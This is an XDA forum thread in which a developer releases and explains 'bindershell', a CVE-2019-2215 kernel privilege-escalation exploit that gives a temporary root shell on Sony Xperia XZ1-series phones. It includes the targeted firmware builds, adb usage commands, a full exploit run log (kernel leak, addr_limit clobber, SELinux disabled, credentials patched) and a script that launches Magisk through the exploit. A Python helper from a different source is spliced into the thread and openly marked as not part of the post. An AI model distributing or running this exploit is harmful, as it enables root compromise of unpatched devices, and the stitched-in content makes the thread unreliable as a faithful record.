[XZ1c/XZ1/XZp] temp root exploit via CVE-2019-2215 including magisk setup [Locked BL]

By j4nn, Recognized Developer on 7th February 2020, 02:21 AM
temp root exploit for sony xperia XZ1c/XZ1/XZp with oreo firmware
by j4nn
https://j4nn.github.io/

Let me present you a temp root exploit for sony xperia XZ1 Compact / XZ1 / XZ Premium phones running android oreo firmware.
The exploit uses CVE-2019-2215, which can get you a temporary root shell very quickly and reliably (it's nearly instant).

SUPPORTED TARGETS
  • XZ1 Compact
    • G8441_47.1.A.8.49 (tested myself)
    • G8441_47.1.A.16.20 (tested myself)
  • XZ1
    • G8341_47.1.A.16.20
    • G8342_47.1.A.16.20
  • XZ Premium
    • G8141_47.1.A.16.20
    • G8142_47.1.A.16.20
with bindershell-v2 following targets added:
  • Xperia XZ1
    • G8343_47.1.A.12.150 (Freedom Canada)
    • G8343_47.1.A.12.205 (Freedom Canada)
    • SO-01K_47.1.F.1.105 (Docomo Japan)
    • SOV36_47.1.C.9.106 (AU Japan)
  • Xperia XZ1 Compact
    • SO-02K_47.1.F.1.105 (Docomo Japan)
  • XZ Premium
    • SO-04J_47.1.F.1.105 (Docomo Japan)

This is an alternative method to my renoroot exploit released before, to get a temp root shell for TA (drm keys) backup.

I've also implemented a script to start up magisk from the temp root shell, so this can be used nicely with still locked phones to enable magisk root without unlocking bootloader with the latest oreo fw. You still cannot modify anything in /system or /vendor partitions due to dm-verity, but you could use it for other useful stuff, like iptables based firewall for example.

Listed firmware versions may be found for example here:
https://www.xperiasite.pl/forum/221-firmware/
https://boycracked.com/?s=xperia+xz1

USAGE HOWTO
  • to get a simple temp root shell
    just download bindershell.zip, unzip, 'adb push bindershell /data/local/tmp' and get temp root:
    Code:
    G8441:/ $ cd /data/local/tmp
    G8441:/data/local/tmp $ chmod 755 ./bindershell
    G8441:/data/local/tmp $ ./bindershell
    
    bindershell - temp root shell for xperia XZ1c/XZ1/XZp using CVE-2019-2215
    https://github.com/j4nn/renoshell/tree/CVE-2019-2215
    
    MAIN: starting exploit for devices with waitqueue at 0x98
    PARENT: Reading leaked data
    PARENT: leaking successful
    MAIN: thread_info should be in stack
    MAIN: parsing kernel stack to find thread_info
    PARENT: Reading leaked data
    PARENT: Reading extra leaked data
    PARENT: leaking successful
    MAIN: task_struct_ptr = ffffffecc9691b00
    MAIN: thread_info_ptr = ffffffecc4c34000
    MAIN: Clobbering addr_limit
    MAIN: should have stable kernel R/W now
    kaslr slide 0x1d35200000
    selinux set to permissive
    current task credentials patched
    
    got root, start shell...
    
    G8441:/data/local/tmp #
  • for temp root with magisk setup
    do as in previous option and download also the magisk-setup-from-exploit.zip and Magisk-v19.3-Manager-v7.1.2.zip, unzip both and use following commands in addition (skip starting the bindershell in previous section):
    Code:
    adb install MagiskManager-v7.1.2.apk
    adb push Magisk-v19.3 /data/local/tmp
    adb shell 'cd /data/local/tmp/Magisk-v19.3 ; chmod 755 * ; /system/bin/sh ./update-binary -x ; ./magiskinit -x magisk magisk'
    adb push magisk-setup.sh /data/local/tmp
    adb shell chmod 755 /data/local/tmp/magisk-setup.sh
    (also present in the included magisk-push.sh script, which you can simply execute in linux or possibly rename to a .bat file and execute it in windows too /not tested though/)
    The above would copy the needed stuff to your phone.
    Then after each boot you can use following command to startup magisk via the exploit:
    Code:
    adb shell 'cd /data/local/tmp ; ./bindershell -c ./magisk-setup.sh'


SOURCES
Source code for the exploit (bindershell) is available here:
https://github.com/j4nn/renoshell/tree/CVE-2019-2215

Magisk startup script is obviously already in source form inside the magisk-setup-from-exploit.zip archive attached.

Magisk binaries packed in the Magisk-v19.3-Manager-v7.1.2.zip are not modified upstream released Magisk-v19.3.zip and MagiskManager-v7.1.2.apk, extracted only needed components and combined into single archive.
It might be possible to use other versions (v19.3+), but that has not been tested and is not supported in any way.

CREDITS
thanks to @arpruss for the su98 exploit variant (where binder_thread wait queue is at 0x98 offset instead of 0xa0, needed completely different approach than the original exploit) - the core of the exploit up to kernel space r/w primitives has been used

DOWNLOAD
Attached screenshots: bindershell-starting-magisk.png, magisk-from-temproot-working.png
Attached files:
  • bindershell.zip (8.1 KB)
  • magisk-setup-from-exploit.zip (1.4 KB)
  • Magisk-v19.3-Manager-v7.1.2.zip (3.49 MB)
  • bindershell-v2.zip (8.3 KB)
7th February 2020, 05:26 AM |#2  
Junior Member
Hi @j4nn, it's done for my XZ1 DUAL. Many thanks. But when I unplug the phone from the computer, then temp root will be reset, is it normal?
PS: Do I need to worry/care about dm-verity?
Attached screenshots: Screenshot_20200207-112550.png, Screenshot_20200207-112601.png
7th February 2020, 11:19 AM |#3  
p@to
Senior Member
I can permanently uninstall bloatware, install adaway and other applications that need root..
I think it's said. But I need to ask.
Thank you
7th February 2020, 07:38 PM |#4  
Senior Member
Quote:
Originally Posted by p@to

I can permanently uninstall bloatware, install adaway and other applications that need root..
I think it's said. But I need to ask.
Thank you

Yes, you can install and use e.g. adaway, AFWall+ etc.
But - as already mentioned in the op - it's not possible to modify /system and /vendor, due to dm-verity, which is still present with a locked bl. Therefore you can't get rid of bloatware, which is placed in /system or /vendor.
7th February 2020, 09:50 PM |#5  
OP Recognized Developer
Actually you can remove bloatware permanently, but without gaining any storage space.
It is possible to do that via oem partition - there you can make modifications, dm-verity does not check oem partition.
It is possible to define which applications would be "removed", then even factory reset would not enable them again.
This way of bloatware removal is quite tricky, as you may need to test factory reset to see if the phone boots or not.
Such debloating can be done via early_config.xml in oem partition - there you can permanently blacklist apps with entries like this:
Code:
   <string-array name="config_packagesBlacklist">
      <item>com.amazon.mShop.android.shopping</item>
   </string-array>
   <string-array name="config_packagesFullBlacklist">
      <item>com.amazon.mShop.android.shopping</item>
   </string-array>
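As an added example (not from the post and not part of j4nn's tools): a small Python helper that adds packages to both blacklist arrays of an early_config.xml, rejects malformed package names and re-parses the result, since the post warns that a mistake in /oem can only really be tested by a factory reset. The `<resources>` root element of the constructed sample file is an assumption; a real file may differ.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample of an early_config.xml as shown in the post; the
# <resources> root element is an assumption, a real file may differ.
SAMPLE_EARLY_CONFIG = """<resources>
    <string-array name="config_packagesBlacklist">
        <item>com.amazon.mShop.android.shopping</item>
    </string-array>
    <string-array name="config_packagesFullBlacklist">
        <item>com.amazon.mShop.android.shopping</item>
    </string-array>
</resources>
"""

BLACKLIST_ARRAYS = ("config_packagesBlacklist", "config_packagesFullBlacklist")
# Android package names: dotted identifiers with at least two segments.
PACKAGE_RE = re.compile(r"^[A-Za-z][A-Za-z0-9_]*(\.[A-Za-z][A-Za-z0-9_]*)+$")


def blacklisted_packages(xml_text):
    """Return {array name: sorted package list} for the two blacklist arrays."""
    root = ET.fromstring(xml_text)  # ParseError if the XML is not well-formed
    found = {name: [] for name in BLACKLIST_ARRAYS}
    for arr in root.iter("string-array"):
        name = arr.get("name")
        if name in found:
            found[name] = sorted(i.text.strip() for i in arr.findall("item") if i.text)
    return found


def add_blacklisted_packages(xml_text, packages):
    """Add packages to both arrays (creating a missing array), skip duplicates,
    reject malformed names, re-parse the result and return the new XML text."""
    bad = [p for p in packages if not PACKAGE_RE.match(p)]
    if bad:
        raise ValueError("invalid package name(s): %s" % ", ".join(bad))
    root = ET.fromstring(xml_text)
    arrays = {a.get("name"): a for a in root.iter("string-array")}
    for name in BLACKLIST_ARRAYS:
        arr = arrays.get(name)
        if arr is None:
            arr = ET.SubElement(root, "string-array", name=name)
        present = {i.text.strip() for i in arr.findall("item") if i.text}
        for pkg in packages:
            if pkg not in present:
                ET.SubElement(arr, "item").text = pkg
                present.add(pkg)
    new_text = ET.tostring(root, encoding="unicode")
    blacklisted_packages(new_text)  # sanity check: result must parse again
    return new_text
```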
8th February 2020, 01:05 AM |#6  
OP Recognized Developer
temp root for new targets available with bindershell-v2 - following targets added:
  • Xperia XZ1
    • G8343_47.1.A.12.150 (Freedom Canada)
    • G8343_47.1.A.12.205 (Freedom Canada)
    • SO-01K_47.1.F.1.105 (Docomo Japan)
    • SOV36_47.1.C.9.106 (AU Japan)
  • Xperia XZ1 Compact
    • SO-02K_47.1.F.1.105 (Docomo Japan)
  • XZ Premium
    • SO-04J_47.1.F.1.105 (Docomo Japan)
(offsets extracted from kernels from fully downloaded firmwares)
8th February 2020, 08:42 AM |#7  
bigrammy
Senior Member
Flag huddersfield
Quote:
Originally Posted by j4nn

temp root exploit for sony xperia XZ1c/XZ1/XZp with oreo firmware
by j4nn

Nice work j4nn
8th February 2020, 12:44 PM |#8  
p@to
Senior Member
@j4nn
Thank you very much for the possibilities you give us due to your great work.
Once TA backup has been carried out, Magisk installed and changes made using root (for example installing adaway, some Magisk module, etc.), are these changes maintained if we update the firmware to Pie?
Can we continue using root with Magisk in Pie?
Thanks in advance

8th February 2020, 12:57 PM |#9  
OP Recognized Developer
@p@to, it's only a temp root. Once you power off / reboot, it is not rooted anymore, you would need to start the exploit again - just the last command starting magisk. Using magisk modules might work or not, it depends - magisk is used in a way here that it has not been designed for (normally it should be started from kernel's ramdisk before the original init).
You need to unlock and restore ta backup in order to get possibilities like custom kernels or full roms, pie or whatever...
The only permanent customizations may be done in oem partition. You could tune the blacklisted apps there in an oem version from pie firmware to prepare it for pie upgrade and then manually flash the rest of the pie fw skipping oem to keep the modded/debloated setup in oem while running pie with still locked BL, obviously without root.
Or stick with the exploitable fw version (latest oreo) to be able to startup magisk after each boot, if you cannot unlock your BL.
8th February 2020, 01:14 PM |#10  
Junior Member
Quote:
Originally Posted by Klaus N.

Yes, you can install and use e.g. adaway, AFWall+ etc.
But - as already mentioned in the op - it's not possible to modify /system and /vendor, due to dm-verity, which is still present with a locked bl. Therefore you can't get rid of bloatware, which is placed in /system or /vendor

Hi @j4nn, can we modify /etc or /cache? Of course we cannot with /system /vendor, but I have no idea about another place.
8th February 2020, 02:16 PM |#11  
OP Recognized Developer
@anaconda875, I believe /etc is a symlink to /system/etc. You could redirect it somewhere else and make changes there. But it would be only temporary, because content of / is coming from kernel's initramfs, that is not possible to modify persistently with just a temp root. You can modify /cache, but I am afraid there is not that interesting stuff to change there.
In my opinion, the most interesting stuff you can modify is the content in /oem, where you can permanently block apps (debloat) or change stuff related to wifi/lte calling.